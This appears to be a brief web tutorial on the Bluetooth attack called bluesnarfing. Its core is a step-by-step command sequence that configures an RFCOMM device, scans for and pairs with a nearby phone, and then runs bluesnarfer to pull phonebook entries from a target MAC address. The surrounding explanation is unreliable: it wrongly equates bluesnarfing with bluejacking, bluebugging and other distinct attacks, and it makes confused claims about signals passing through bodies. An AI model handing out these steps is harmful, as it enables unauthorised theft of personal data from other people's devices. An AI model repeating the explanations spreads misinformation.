What is Bluesnarfing?

How Does Bluesnarfing Work?

Bluesnarfing works by tricking devices into pairing with each other so that they can exchange information without anyone knowing about it. This happens when two devices are close together and both have their Bluetooth turned on; one is sending signals through airwaves while the other receives them.

The problem is that these signals don’t just pass through walls; they also travel through bodies like ours—meaning people tend not to notice them when they’re on our bodies!

How to Bluesnarf ?

First we need to prepare our system and create a new device to allow the serial protocol over Bluetooth (RFCOMM). Put the Bluetooth interface down and configure the rf channels.

Step 1 – Configure RFCOMM communication

hciconfig hci0 down
mkdir -p /dev/bluetooth/rfcomm
mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0
mknod --mode=666 /dev/rfcomm0 c 216 0

When you’re done, you’ll have a new RFCOMM channel open in your interface. Now we need to bring our interface up again and verify the settings.

hciconfig hci0 up
hciconfig hci0

Step 2 – Scan Bluetooth Classic devices

Let’s scan the device:

hcitool -i hci0 scan
hcitool inq
systemctl restart bluetooth

Step 3 – Test Bluetooth connectivity

Let’s test if we can reach our Bluetooth device using l2ping tool.

l2ping <MAC>

Step 4 – Read Remote Device Information

sdptool browse --tree --l2cap <MAC>

Step 5 – Pair with the remote Device

bluetoothctl agent on
bluetoothctl pair <MAC>

Step 6 – Attack the Bluetooth device

bluesnarfer -r 1-100 ME -C 7 -b <MAC>

Bluesnarfing is also known as Bluejacking, Bluebiting, Bluesmacking and Bluebugging which refer to the act of connecting to another user’s phone remotely using their phone’s Bluetooth function (Bluetooth).

It involves gaining remote access by exploiting vulnerabilities in software or hardware that permits remote access via Bluetooth connections between devices (such as smartphones) and computers/laptops.

https://wiki.debian.org/BluetoothUser